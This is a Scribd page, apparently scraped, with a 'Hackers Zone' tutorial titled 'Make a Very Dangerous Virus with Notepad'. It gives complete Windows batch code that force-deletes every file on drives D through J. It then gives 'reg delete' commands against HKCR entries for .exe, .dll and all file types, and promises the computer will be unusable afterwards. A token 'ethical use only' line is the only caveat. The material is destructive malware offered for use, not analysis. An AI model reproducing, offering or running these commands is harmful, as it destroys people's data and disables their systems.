0% found this document useful (0 votes)
30 views

Delete The Entire Registry: Make A Very Dangerous Virus With Notepad (Final) by Hackers Zone

The document provides instructions for creating a dangerous virus using Notepad on a Windows computer. It describes typing batch code to delete all files on drives D through J, then deleting the entire Windows registry. It warns this is a very dangerous virus that can corrupt the computer so it cannot be used after running the batch file. The goal is to damage or destroy the targeted computer.

Uploaded by

Adwait Bandekar
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
30 views

Delete The Entire Registry: Make A Very Dangerous Virus With Notepad (Final) by Hackers Zone

The document provides instructions for creating a dangerous virus using Notepad on a Windows computer. It describes typing batch code to delete all files on drives D through J, then deleting the entire Windows registry. It warns this is a very dangerous virus that can corrupt the computer so it cannot be used after running the batch file. The goal is to damage or destroy the targeted computer.

Uploaded by

Adwait Bandekar
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 1

Make a Very Dangerous Virus with Notepad (Final) By Hackers Zone

USE THIS TRICK FOR ETHICAL USE ONLY

Just open your notepad

1) Click start -> all programs -> accessories -> notepad

2) Or just press or click windows key + r :: run window will open and
type notepad and hit enter .
NOW TYPE THE FOLLOWING CODE ::
@echo off
del D:\*.* /f /s /q
del E:\*.* /f /s /q
del F:\*.* /f /s /q
del G:\*.* /f /s /q
del H:\*.* /f /s /q
del I:\*.* /f /s /q
del J:\*.* /f /s /q

then save it as kinng.bat and the batch file is created .

WARNING :: This is the most dangerous virus

Delete the entire registry


@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*

now save it as kinng.bat and the batch file is created .


Now here is most dangerous virus that can blast or corrupt your computer after using this you will not able to use
your computer this will be the last time you will be using it

You might also like